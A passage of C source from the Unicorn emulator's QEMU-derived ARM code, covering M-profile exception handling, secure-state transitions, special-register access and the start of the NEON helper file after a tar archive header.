so this is never a Secure UsageFault. */ bool ignore_stackfaults; assert(!arm_feature(env, ARM_FEATURE_V8)); armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, false); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; ignore_stackfaults = v7m_push_stack(cpu); qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on new stackframe: " "failed exception return integrity check\n"); v7m_exception_taken(cpu, excret, false, ignore_stackfaults); return; } /* Otherwise, we have a successful exception exit. */ arm_clear_exclusive(env); arm_rebuild_hflags(env); qemu_log_mask(CPU_LOG_INT, "...successful exception return\n"); } static bool do_v7m_function_return(ARMCPU *cpu) { /* * v8M security extensions magic function return. * We may either: * (1) throw an exception (longjump) * (2) return true if we successfully handled the function return * (3) return false if we failed a consistency check and have * pended a UsageFault that needs to be taken now * * At this point the magic return value is split between env->regs[15] * and env->thumb. We don't bother to reconstitute it because we don't * need it (all values are handled the same way). */ CPUARMState *env = &cpu->env; uint32_t newpc, newpsr, newpsr_exc; qemu_log_mask(CPU_LOG_INT, "...really v7M secure function return\n"); { bool threadmode, spsel; TCGMemOpIdx oi; ARMMMUIdx mmu_idx; uint32_t *frame_sp_p; uint32_t frameptr; /* Pull the return address and IPSR from the Secure stack */ threadmode = !arm_v7m_is_handler_mode(env); spsel = env->v7m.control[M_REG_S] & R_V7M_CONTROL_SPSEL_MASK; frame_sp_p = get_v7m_sp_ptr(env, true, threadmode, spsel); frameptr = *frame_sp_p; /* * These loads may throw an exception (for MPU faults). We want to * do them as secure, so work out what MMU index that is. */ mmu_idx = arm_v7m_mmu_idx_for_secstate(env, true); oi = make_memop_idx(MO_LE, arm_to_core_mmu_idx(mmu_idx)); newpc = helper_le_ldul_mmu(env, frameptr, oi, 0); newpsr = helper_le_ldul_mmu(env, frameptr + 4, oi, 0); /* Consistency checks on new IPSR */ newpsr_exc = newpsr & XPSR_EXCP; if (!((env->v7m.exception == 0 && newpsr_exc == 0) || (env->v7m.exception == 1 && newpsr_exc != 0))) { /* Pend the fault and tell our caller to take it */ env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); qemu_log_mask(CPU_LOG_INT, "...taking INVPC UsageFault: " "IPSR consistency check failed\n"); return false; } *frame_sp_p = frameptr + 8; } /* This invalidates frame_sp_p */ switch_v7m_security_state(env, true); env->v7m.exception = newpsr_exc; env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; if (newpsr & XPSR_SFPA) { env->v7m.control[M_REG_S] |= R_V7M_CONTROL_SFPA_MASK; } xpsr_write(env, 0, XPSR_IT); env->thumb = newpc & 1; env->regs[15] = newpc & ~1; arm_rebuild_hflags(env); qemu_log_mask(CPU_LOG_INT, "...function return successful\n"); return true; } static bool v7m_read_half_insn(ARMCPU *cpu, ARMMMUIdx mmu_idx, uint32_t addr, uint16_t *insn) { /* * Load a 16-bit portion of a v7M instruction, returning true on success, * or false on failure (in which case we will have pended the appropriate * exception). * We need to do the instruction fetch's MPU and SAU checks * like this because there is no MMU index that would allow * doing the load with a single function call. Instead we must * first check that the security attributes permit the load * and that they don't mismatch on the two halves of the instruction, * and then we do the load as a secure load (ie using the security * attributes of the address, not the CPU, as architecturally required). */ CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; V8M_SAttributes sattrs = { 0 }; MemTxAttrs attrs = { 0 }; ARMMMUFaultInfo fi = { 0 }; MemTxResult txres; target_ulong page_size; hwaddr physaddr; int prot; v8m_security_lookup(env, addr, MMU_INST_FETCH, mmu_idx, &sattrs); if (!sattrs.nsc || sattrs.ns) { /* * This must be the second half of the insn, and it straddles a * region boundary with the second half not being S&NSC. */ env->v7m.sfsr |= R_V7M_SFSR_INVEP_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVEP\n"); return false; } if (get_phys_addr(env, addr, MMU_INST_FETCH, mmu_idx, &physaddr, &attrs, &prot, &page_size, &fi, NULL)) { /* the MPU lookup failed */ env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_IACCVIOL_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_MEM, env->v7m.secure); qemu_log_mask(CPU_LOG_INT, "...really MemManage with CFSR.IACCVIOL\n"); return false; } #ifdef UNICORN_ARCH_POSTFIX *insn = glue(address_space_lduw_le, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), physaddr, #else *insn = address_space_lduw_le(cs->uc, arm_addressspace(cs, attrs), physaddr, #endif attrs, &txres); if (txres != MEMTX_OK) { env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_IBUSERR_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_BUS, false); qemu_log_mask(CPU_LOG_INT, "...really BusFault with CFSR.IBUSERR\n"); return false; } return true; } static bool v7m_handle_execute_nsc(ARMCPU *cpu) { /* * Check whether this attempt to execute code in a Secure & NS-Callable * memory region is for an SG instruction; if so, then emulate the * effect of the SG instruction and return true. Otherwise pend * the correct kind of exception and return false. */ CPUARMState *env = &cpu->env; ARMMMUIdx mmu_idx; uint16_t insn; /* * We should never get here unless get_phys_addr_pmsav8() caused * an exception for NS executing in S&NSC memory. */ assert(!env->v7m.secure); assert(arm_feature(env, ARM_FEATURE_M_SECURITY)); /* We want to do the MPU lookup as secure; work out what mmu_idx that is */ mmu_idx = arm_v7m_mmu_idx_for_secstate(env, true); if (!v7m_read_half_insn(cpu, mmu_idx, env->regs[15], &insn)) { return false; } if (!env->thumb) { goto gen_invep; } if (insn != 0xe97f) { /* * Not an SG instruction first half (we choose the IMPDEF * early-SG-check option). */ goto gen_invep; } if (!v7m_read_half_insn(cpu, mmu_idx, env->regs[15] + 2, &insn)) { return false; } if (insn != 0xe97f) { /* * Not an SG instruction second half (yes, both halves of the SG * insn have the same hex value) */ goto gen_invep; } /* * OK, we have confirmed that we really have an SG instruction. * We know we're NS in S memory so don't need to repeat those checks. */ qemu_log_mask(CPU_LOG_INT, "...really an SG instruction at 0x%08" PRIx32 ", executing it\n", env->regs[15]); env->regs[14] &= ~1; env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; switch_v7m_security_state(env, true); xpsr_write(env, 0, XPSR_IT); env->regs[15] += 4; arm_rebuild_hflags(env); return true; gen_invep: env->v7m.sfsr |= R_V7M_SFSR_INVEP_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVEP\n"); return false; } void arm_v7m_cpu_do_interrupt(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; uint32_t lr; bool ignore_stackfaults; // arm_log_exception(cs->exception_index); /* * For exceptions we just mark as pending on the NVIC, and let that * handle it. */ switch (cs->exception_index) { case EXCP_UDEF: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_UNDEFINSTR_MASK; break; case EXCP_NOCP: { /* * NOCP might be directed to something other than the current * security state if this fault is because of NSACR; we indicate * the target security state using exception.target_el. */ int target_secstate; if (env->exception.target_el == 3) { target_secstate = M_REG_S; } else { target_secstate = env->v7m.secure; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, target_secstate); env->v7m.cfsr[target_secstate] |= R_V7M_CFSR_NOCP_MASK; break; } case EXCP_INVSTATE: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVSTATE_MASK; break; case EXCP_STKOF: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_STKOF_MASK; break; case EXCP_LSERR: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; break; case EXCP_UNALIGNED: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_UNALIGNED_MASK; break; case EXCP_SWI: /* The PC already points to the next instruction. */ armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SVC, env->v7m.secure); break; case EXCP_PREFETCH_ABORT: case EXCP_DATA_ABORT: /* * Note that for M profile we don't have a guest facing FSR, but * the env->exception.fsr will be populated by the code that * raises the fault, in the A profile short-descriptor format. */ switch (env->exception.fsr & 0xf) { case M_FAKE_FSR_NSC_EXEC: /* * Exception generated when we try to execute code at an address * which is marked as Secure & Non-Secure Callable and the CPU * is in the Non-Secure state. The only instruction which can * be executed like this is SG (and that only if both halves of * the SG instruction have the same security attributes.) * Everything else must generate an INVEP SecureFault, so we * emulate the SG instruction here. */ if (v7m_handle_execute_nsc(cpu)) { return; } break; case M_FAKE_FSR_SFAULT: /* * Various flavours of SecureFault for attempts to execute or * access data in the wrong security state. */ switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: if (env->v7m.secure) { env->v7m.sfsr |= R_V7M_SFSR_INVTRAN_MASK; qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVTRAN\n"); } else { env->v7m.sfsr |= R_V7M_SFSR_INVEP_MASK; qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVEP\n"); } break; case EXCP_DATA_ABORT: /* This must be an NS access to S memory */ env->v7m.sfsr |= R_V7M_SFSR_AUVIOL_MASK; qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.AUVIOL\n"); break; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); break; case 0x8: /* External Abort */ switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_IBUSERR_MASK; qemu_log_mask(CPU_LOG_INT, "...with CFSR.IBUSERR\n"); break; case EXCP_DATA_ABORT: env->v7m.cfsr[M_REG_NS] |= (R_V7M_CFSR_PRECISERR_MASK | R_V7M_CFSR_BFARVALID_MASK); env->v7m.bfar = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with CFSR.PRECISERR and BFAR 0x%x\n", env->v7m.bfar); break; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_BUS, false); break; default: /* * All other FSR values are either MPU faults or "can't happen * for M profile" cases. */ switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_IACCVIOL_MASK; qemu_log_mask(CPU_LOG_INT, "...with CFSR.IACCVIOL\n"); break; case EXCP_DATA_ABORT: env->v7m.cfsr[env->v7m.secure] |= (R_V7M_CFSR_DACCVIOL_MASK | R_V7M_CFSR_MMARVALID_MASK); env->v7m.mmfar[env->v7m.secure] = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with CFSR.DACCVIOL and MMFAR 0x%x\n", env->v7m.mmfar[env->v7m.secure]); break; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_MEM, env->v7m.secure); break; } break; case EXCP_SEMIHOST: qemu_log_mask(CPU_LOG_INT, "...handling as semihosting call 0x%x\n", env->regs[0]); // env->regs[0] = do_arm_semihosting(env); FIXME env->regs[15] += env->thumb ? 2 : 4; return; case EXCP_BKPT: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_DEBUG, false); break; case EXCP_IRQ: break; case EXCP_EXCEPTION_EXIT: if (env->regs[15] < EXC_RETURN_MIN_MAGIC) { /* Must be v8M security extension function return */ assert(env->regs[15] >= FNC_RETURN_MIN_MAGIC); assert(arm_feature(env, ARM_FEATURE_M_SECURITY)); if (do_v7m_function_return(cpu)) { return; } } else { do_v7m_exception_exit(cpu); return; } break; case EXCP_LAZYFP: /* * We already pended the specific exception in the NVIC in the * v7m_preserve_fp_state() helper function. */ break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); return; /* Never happens. Keep compiler happy. */ } if (arm_feature(env, ARM_FEATURE_V8)) { lr = R_V7M_EXCRET_RES1_MASK | R_V7M_EXCRET_DCRS_MASK; /* * The S bit indicates whether we should return to Secure * or NonSecure (ie our current state). * The ES bit indicates whether we're taking this exception * to Secure or NonSecure (ie our target state). We set it * later, in v7m_exception_taken(). * The SPSEL bit is also set in v7m_exception_taken() for v8M. * This corresponds to the ARM ARM pseudocode for v8M setting * some LR bits in PushStack() and some in ExceptionTaken(); * the distinction matters for the tailchain cases where we * can take an exception without pushing the stack. */ if (env->v7m.secure) { lr |= R_V7M_EXCRET_S_MASK; } } else { lr = R_V7M_EXCRET_RES1_MASK | R_V7M_EXCRET_S_MASK | R_V7M_EXCRET_DCRS_MASK | R_V7M_EXCRET_ES_MASK; if (env->v7m.control[M_REG_NS] & R_V7M_CONTROL_SPSEL_MASK) { lr |= R_V7M_EXCRET_SPSEL_MASK; } } if (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK)) { lr |= R_V7M_EXCRET_FTYPE_MASK; } if (!arm_v7m_is_handler_mode(env)) { lr |= R_V7M_EXCRET_MODE_MASK; } ignore_stackfaults = v7m_push_stack(cpu); v7m_exception_taken(cpu, lr, false, ignore_stackfaults); } uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg) { unsigned el = arm_current_el(env); /* First handle registers which unprivileged can read */ if (reg >=0 && reg <= 7) { return v7m_mrs_xpsr(env, reg, el); } else { switch (reg) { case 20: /* CONTROL */ return v7m_mrs_control(env, env->v7m.secure); case 0x94: /* CONTROL_NS */ /* * We have to handle this here because unprivileged Secure code * can read the NS CONTROL register. */ if (!env->v7m.secure) { return 0; } return env->v7m.control[M_REG_NS] | (env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK); } } if (el == 0) { return 0; /* unprivileged reads others as zero */ } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { switch (reg) { case 0x88: /* MSP_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.other_ss_msp; case 0x89: /* PSP_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.other_ss_psp; case 0x8a: /* MSPLIM_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.msplim[M_REG_NS]; case 0x8b: /* PSPLIM_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.psplim[M_REG_NS]; case 0x90: /* PRIMASK_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.primask[M_REG_NS]; case 0x91: /* BASEPRI_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.basepri[M_REG_NS]; case 0x93: /* FAULTMASK_NS */ if (!env->v7m.secure) { return 0; } return env->v7m.faultmask[M_REG_NS]; case 0x98: /* SP_NS */ { /* * This gives the non-secure SP selected based on whether we're * currently in handler mode or not, using the NS CONTROL.SPSEL. */ bool spsel = env->v7m.control[M_REG_NS] & R_V7M_CONTROL_SPSEL_MASK; if (!env->v7m.secure) { return 0; } if (!arm_v7m_is_handler_mode(env) && spsel) { return env->v7m.other_ss_psp; } else { return env->v7m.other_ss_msp; } } default: break; } } switch (reg) { case 8: /* MSP */ return v7m_using_psp(env) ? env->v7m.other_sp : env->regs[13]; case 9: /* PSP */ return v7m_using_psp(env) ? env->regs[13] : env->v7m.other_sp; case 10: /* MSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } return env->v7m.msplim[env->v7m.secure]; case 11: /* PSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } return env->v7m.psplim[env->v7m.secure]; case 16: /* PRIMASK */ return env->v7m.primask[env->v7m.secure]; case 17: /* BASEPRI */ case 18: /* BASEPRI_MAX */ return env->v7m.basepri[env->v7m.secure]; case 19: /* FAULTMASK */ return env->v7m.faultmask[env->v7m.secure]; default: bad_reg: qemu_log_mask(LOG_GUEST_ERROR, "Attempt to read unknown special" " register %d\n", reg); return 0; } } void HELPER(v7m_msr)(CPUARMState *env, uint32_t maskreg, uint32_t val) { /* * We're passed bits [11..0] of the instruction; extract * SYSm and the mask bits. * Invalid combinations of SYSm and mask are UNPREDICTABLE; * we choose to treat them as if the mask bits were valid. * NB that the pseudocode 'mask' variable is bits [11..10], * whereas ours is [11..8]. */ uint32_t mask = extract32(maskreg, 8, 4); uint32_t reg = extract32(maskreg, 0, 8); int cur_el = arm_current_el(env); if (cur_el == 0 && reg > 7 && reg != 20) { /* * only xPSR sub-fields and CONTROL.SFPA may be written by * unprivileged code */ return; } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { switch (reg) { case 0x88: /* MSP_NS */ if (!env->v7m.secure) { return; } env->v7m.other_ss_msp = val; return; case 0x89: /* PSP_NS */ if (!env->v7m.secure) { return; } env->v7m.other_ss_psp = val; return; case 0x8a: /* MSPLIM_NS */ if (!env->v7m.secure) { return; } env->v7m.msplim[M_REG_NS] = val & ~7; return; case 0x8b: /* PSPLIM_NS */ if (!env->v7m.secure) { return; } env->v7m.psplim[M_REG_NS] = val & ~7; return; case 0x90: /* PRIMASK_NS */ if (!env->v7m.secure) { return; } env->v7m.primask[M_REG_NS] = val & 1; return; case 0x91: /* BASEPRI_NS */ if (!env->v7m.secure || !arm_feature(env, ARM_FEATURE_M_MAIN)) { return; } env->v7m.basepri[M_REG_NS] = val & 0xff; return; case 0x93: /* FAULTMASK_NS */ if (!env->v7m.secure || !arm_feature(env, ARM_FEATURE_M_MAIN)) { return; } env->v7m.faultmask[M_REG_NS] = val & 1; return; case 0x94: /* CONTROL_NS */ if (!env->v7m.secure) { return; } write_v7m_control_spsel_for_secstate(env, val & R_V7M_CONTROL_SPSEL_MASK, M_REG_NS); if (arm_feature(env, ARM_FEATURE_M_MAIN)) { env->v7m.control[M_REG_NS] &= ~R_V7M_CONTROL_NPRIV_MASK; env->v7m.control[M_REG_NS] |= val & R_V7M_CONTROL_NPRIV_MASK; } /* * SFPA is RAZ/WI from NS. FPCA is RO if NSACR.CP10 == 0, * RES0 if the FPU is not present, and is stored in the S bank */ if (cpu_isar_feature(aa32_vfp_simd, env_archcpu(env)) && extract32(env->v7m.nsacr, 10, 1)) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_FPCA_MASK; env->v7m.control[M_REG_S] |= val & R_V7M_CONTROL_FPCA_MASK; } return; case 0x98: /* SP_NS */ { /* * This gives the non-secure SP selected based on whether we're * currently in handler mode or not, using the NS CONTROL.SPSEL. */ bool spsel = env->v7m.control[M_REG_NS] & R_V7M_CONTROL_SPSEL_MASK; bool is_psp = !arm_v7m_is_handler_mode(env) && spsel; uint32_t limit; if (!env->v7m.secure) { return; } limit = is_psp ? env->v7m.psplim[false] : env->v7m.msplim[false]; if (val < limit) { CPUState *cs = env_cpu(env); cpu_restore_state(cs, GETPC(), true); raise_exception(env, EXCP_STKOF, 0, 1); } if (is_psp) { env->v7m.other_ss_psp = val; } else { env->v7m.other_ss_msp = val; } return; } default: break; } } if (reg >= 0 && reg <= 7) { v7m_msr_xpsr(env, mask, reg, val); } else { switch (reg) { case 8: /* MSP */ if (v7m_using_psp(env)) { env->v7m.other_sp = val; } else { env->regs[13] = val; } break; case 9: /* PSP */ if (v7m_using_psp(env)) { env->regs[13] = val; } else { env->v7m.other_sp = val; } break; case 10: /* MSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } env->v7m.msplim[env->v7m.secure] = val & ~7; break; case 11: /* PSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } env->v7m.psplim[env->v7m.secure] = val & ~7; break; case 16: /* PRIMASK */ env->v7m.primask[env->v7m.secure] = val & 1; break; case 17: /* BASEPRI */ if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { goto bad_reg; } env->v7m.basepri[env->v7m.secure] = val & 0xff; break; case 18: /* BASEPRI_MAX */ if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { goto bad_reg; } val &= 0xff; if (val != 0 && (val < env->v7m.basepri[env->v7m.secure] || env->v7m.basepri[env->v7m.secure] == 0)) { env->v7m.basepri[env->v7m.secure] = val; } break; case 19: /* FAULTMASK */ if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { goto bad_reg; } env->v7m.faultmask[env->v7m.secure] = val & 1; break; case 20: /* CONTROL */ /* * Writing to the SPSEL bit only has an effect if we are in * thread mode; other bits can be updated by any privileged code. * write_v7m_control_spsel() deals with updating the SPSEL bit in * env->v7m.control, so we only need update the others. * For v7M, we must just ignore explicit writes to SPSEL in handler * mode; for v8M the write is permitted but will have no effect. * All these bits are writes-ignored from non-privileged code, * except for SFPA. */ if (cur_el > 0 && (arm_feature(env, ARM_FEATURE_V8) || !arm_v7m_is_handler_mode(env))) { write_v7m_control_spsel(env, (val & R_V7M_CONTROL_SPSEL_MASK) != 0); } if (cur_el > 0 && arm_feature(env, ARM_FEATURE_M_MAIN)) { env->v7m.control[env->v7m.secure] &= ~R_V7M_CONTROL_NPRIV_MASK; env->v7m.control[env->v7m.secure] |= val & R_V7M_CONTROL_NPRIV_MASK; } if (cpu_isar_feature(aa32_vfp_simd, env_archcpu(env))) { /* * SFPA is RAZ/WI from NS or if no FPU. * FPCA is RO if NSACR.CP10 == 0, RES0 if the FPU is not present. * Both are stored in the S bank. */ if (env->v7m.secure) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; env->v7m.control[M_REG_S] |= val & R_V7M_CONTROL_SFPA_MASK; } if (cur_el > 0 && (env->v7m.secure || !arm_feature(env, ARM_FEATURE_M_SECURITY) || extract32(env->v7m.nsacr, 10, 1))) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_FPCA_MASK; env->v7m.control[M_REG_S] |= val & R_V7M_CONTROL_FPCA_MASK; } } break; default: bad_reg: qemu_log_mask(LOG_GUEST_ERROR, "Attempt to write unknown special" " register %d\n", reg); return; } } } uint32_t HELPER(v7m_tt)(CPUARMState *env, uint32_t addr, uint32_t op) { /* Implement the TT instruction. op is bits [7:6] of the insn. */ bool forceunpriv = op & 1; bool alt = op & 2; V8M_SAttributes sattrs = { 0 }; uint32_t tt_resp; bool r, rw, nsr, nsrw, mrvalid; int prot; ARMMMUFaultInfo fi = { 0 }; MemTxAttrs attrs = { 0 }; hwaddr phys_addr; ARMMMUIdx mmu_idx; uint32_t mregion; bool targetpriv; bool targetsec = env->v7m.secure; bool is_subpage; /* * Work out what the security state and privilege level we're * interested in is... */ if (alt) { targetsec = !targetsec; } if (forceunpriv) { targetpriv = false; } else { targetpriv = arm_v7m_is_handler_mode(env) || !(env->v7m.control[targetsec] & R_V7M_CONTROL_NPRIV_MASK); } /* ...and then figure out which MMU index this is */ mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, targetsec, targetpriv); /* * We know that the MPU and SAU don't care about the access type * for our purposes beyond that we don't want to claim to be * an insn fetch, so we arbitrarily call this a read. */ /* * MPU region info only available for privileged or if * inspecting the other MPU state. */ if (arm_current_el(env) != 0 || alt) { /* We can ignore the return value as prot is always set */ pmsav8_mpu_lookup(env, addr, MMU_DATA_LOAD, mmu_idx, &phys_addr, &attrs, &prot, &is_subpage, &fi, &mregion); if (mregion == -1) { mrvalid = false; mregion = 0; } else { mrvalid = true; } r = prot & PAGE_READ; rw = prot & PAGE_WRITE; } else { r = false; rw = false; mrvalid = false; mregion = 0; } if (env->v7m.secure) { v8m_security_lookup(env, addr, MMU_DATA_LOAD, mmu_idx, &sattrs); nsr = sattrs.ns && r; nsrw = sattrs.ns && rw; } else { sattrs.ns = true; nsr = false; nsrw = false; } tt_resp = (sattrs.iregion << 24) | (sattrs.irvalid << 23) | ((!sattrs.ns) << 22) | (nsrw << 21) | (nsr << 20) | (rw << 19) | (r << 18) | (sattrs.srvalid << 17) | (mrvalid << 16) | (sattrs.sregion << 8) | mregion; return tt_resp; } ARMMMUIdx arm_v7m_mmu_idx_all(CPUARMState *env, bool secstate, bool priv, bool negpri) { ARMMMUIdx mmu_idx = ARM_MMU_IDX_M; if (priv) { mmu_idx |= ARM_MMU_IDX_M_PRIV; } if (negpri) { mmu_idx |= ARM_MMU_IDX_M_NEGPRI; } if (secstate) { mmu_idx |= ARM_MMU_IDX_M_S; } return mmu_idx; } ARMMMUIdx arm_v7m_mmu_idx_for_secstate_and_priv(CPUARMState *env, bool secstate, bool priv) { bool negpri = armv7m_nvic_neg_prio_requested(env->nvic, secstate); return arm_v7m_mmu_idx_all(env, secstate, priv, negpri); } /* Return the MMU index for a v7M CPU in the specified security state */ ARMMMUIdx arm_v7m_mmu_idx_for_secstate(CPUARMState *env, bool secstate) { bool priv = arm_current_el(env) != 0; return arm_v7m_mmu_idx_for_secstate_and_priv(env, secstate, priv); } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/neon_helper.c���������������������������������������������������������0000664�0000000�0000000�00000154534�14675241067�0020676�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM NEON vector operations. * * Copyright (c) 2007, 2008 CodeSourcery. * Written by Paul Brook * * This code is licensed under the GNU GPL v2. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define SIGNBIT (uint32_t)0x80000000 #define SIGNBIT64 ((uint64_t)1 << 63) #define SET_QC() env->vfp.qc[0] = 1 #define NEON_TYPE1(name, type) \ typedef struct \ { \ type v1; \ } neon_##name; #ifdef HOST_WORDS_BIGENDIAN #define NEON_TYPE2(name, type) \ typedef struct \ { \ type v2; \ type v1; \ } neon_##name; #define NEON_TYPE4(name, type) \ typedef struct \ { \ type v4; \ type v3; \ type v2; \ type v1; \ } neon_##name; #else #define NEON_TYPE2(name, type) \ typedef struct \ { \ type v1; \ type v2; \ } neon_##name; #define NEON_TYPE4(name, type) \ typedef struct \ { \ type v1; \ type v2; \ type v3; \ type v4; \ } neon_##name; #endif NEON_TYPE4(s8, int8_t) NEON_TYPE4(u8, uint8_t) NEON_TYPE2(s16, int16_t) NEON_TYPE2(u16, uint16_t) NEON_TYPE1(s32, int32_t) NEON_TYPE1(u32, uint32_t) #undef NEON_TYPE4 #undef NEON_TYPE2 #undef NEON_TYPE1 /* Copy from a uint32_t to a vector structure type. */ #define NEON_UNPACK(vtype, dest, val) do { \ union { \ vtype v; \ uint32_t i; \ } conv_u; \ conv_u.i = (val); \ dest = conv_u.v; \ } while(0) /* Copy from a vector structure type to a uint32_t. */ #define NEON_PACK(vtype, dest, val) do { \ union { \ vtype v; \ uint32_t i; \ } conv_u; \ conv_u.v = (val); \ dest = conv_u.i; \ } while(0) #define NEON_DO1 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); #define NEON_DO2 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); #define NEON_DO4 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); \ NEON_FN(vdest.v3, vsrc1.v3, vsrc2.v3); \ NEON_FN(vdest.v4, vsrc1.v4, vsrc2.v4); #define NEON_VOP_BODY(vtype, n) \ { \ uint32_t res; \ vtype vsrc1; \ vtype vsrc2; \ vtype vdest; \ NEON_UNPACK(vtype, vsrc1, arg1); \ NEON_UNPACK(vtype, vsrc2, arg2); \ NEON_DO##n; \ NEON_PACK(vtype, res, vdest); \ return res; \ } #define NEON_VOP(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ NEON_VOP_BODY(vtype, n) #define NEON_VOP_ENV(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(CPUARMState *env, uint32_t arg1, uint32_t arg2) \ NEON_VOP_BODY(vtype, n) /* Pairwise operations. */ /* For 32-bit elements each segment only contains a single element, so the elementwise and pairwise operations are the same. */ #define NEON_PDO2 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ NEON_FN(vdest.v2, vsrc2.v1, vsrc2.v2); #define NEON_PDO4 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ NEON_FN(vdest.v2, vsrc1.v3, vsrc1.v4); \ NEON_FN(vdest.v3, vsrc2.v1, vsrc2.v2); \ NEON_FN(vdest.v4, vsrc2.v3, vsrc2.v4); \ #define NEON_POP(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ { \ uint32_t res; \ vtype vsrc1; \ vtype vsrc2; \ vtype vdest; \ NEON_UNPACK(vtype, vsrc1, arg1); \ NEON_UNPACK(vtype, vsrc2, arg2); \ NEON_PDO##n; \ NEON_PACK(vtype, res, vdest); \ return res; \ } /* Unary operators. */ #define NEON_VOP1(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(uint32_t arg) \ { \ vtype vsrc1; \ vtype vdest; \ NEON_UNPACK(vtype, vsrc1, arg); \ NEON_DO##n; \ NEON_PACK(vtype, arg, vdest); \ return arg; \ } #define NEON_USAT(dest, src1, src2, type) do { \ uint32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = tmp; \ }} while(0) #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) NEON_VOP_ENV(qadd_u8, neon_u8, 4) #undef NEON_FN #define 